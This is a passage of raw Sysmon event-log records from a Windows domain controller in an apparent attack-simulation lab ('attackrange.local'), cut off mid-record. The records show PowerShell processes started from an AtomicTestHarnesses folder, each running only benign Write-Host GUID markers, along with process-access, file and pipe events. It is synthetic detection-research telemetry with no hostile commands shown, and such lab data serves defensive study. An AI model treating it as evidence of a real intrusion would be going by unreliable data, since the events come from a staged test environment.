16:51:41.043{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D1D-603E-4EAA-00000000AD01}10224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002234853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.045{05ADC7E1-6D1D-603E-4EAA-00000000AD01}10224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -C Write-Host 18a23ed5-5bc9-40cc-a8df-affcdadc518bC:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002234984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.965{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFF41269DC036FE8FB9D53E2B0F9C111,SHA256=7D34DA52B6787D4AD93C72A0E7D17973FE040E0986254329E963135E5DAAEB30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.965{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A06662A0BC23831F92DE54AA4687BAAC,SHA256=42D5749EFA8C35A26D621FC60C51C2F3C9446B01B27AABA2CF687268CC211EC0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002234982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.934{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D1E-603E-54AA-00000000AD01}9184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.934{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D1E-603E-54AA-00000000AD01}9184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.887{05ADC7E1-229D-6039-0B00-00000000AD01}85214476C:\Windows\system32\lsass.exe{05ADC7E1-6D1E-603E-54AA-00000000AD01}9184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.887{05ADC7E1-229D-6039-0B00-00000000AD01}85214476C:\Windows\system32\lsass.exe{05ADC7E1-6D1E-603E-54AA-00000000AD01}9184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002234978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:51:42.871{05ADC7E1-6D1E-603E-54AA-00000000AD01}9184\PSHost.132591775027780953.9184.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002234977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.840{05ADC7E1-6D1E-603E-54AA-00000000AD01}9184ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_gwr2kvbv.ord.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.840{05ADC7E1-6D1E-603E-54AA-00000000AD01}9184ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_52j5i2vl.nls.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002234975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.823{05ADC7E1-6D1E-603E-54AA-00000000AD01}9184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_52j5i2vl.nls.ps12021-03-02 16:51:42.823 10341000x80000000000000002234974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.819{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D1E-603E-54AA-00000000AD01}9184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.777{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D1E-603E-54AA-00000000AD01}9184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.777{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.777{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.777{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.777{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.777{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D1E-603E-54AA-00000000AD01}9184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002234967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.777{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D1E-603E-54AA-00000000AD01}9184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002234966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.778{05ADC7E1-6D1E-603E-54AA-00000000AD01}9184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command Write-Host c01836d0-4d10-44a7-be38-dd5793863ba4C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002234965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.746{05ADC7E1-6D1E-603E-53AA-00000000AD01}12932ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.684{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E7C563C589854566F8ADBC51EFBE220,SHA256=F903DE670AC6C9C826636A788D7313072813274D0D15716F8CCC326FC33EA770,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002234963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.637{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D1E-603E-53AA-00000000AD01}12932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.637{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D1E-603E-53AA-00000000AD01}12932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.606{05ADC7E1-229D-6039-0B00-00000000AD01}85214476C:\Windows\system32\lsass.exe{05ADC7E1-6D1E-603E-53AA-00000000AD01}12932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.606{05ADC7E1-229D-6039-0B00-00000000AD01}85214476C:\Windows\system32\lsass.exe{05ADC7E1-6D1E-603E-53AA-00000000AD01}12932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002234959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 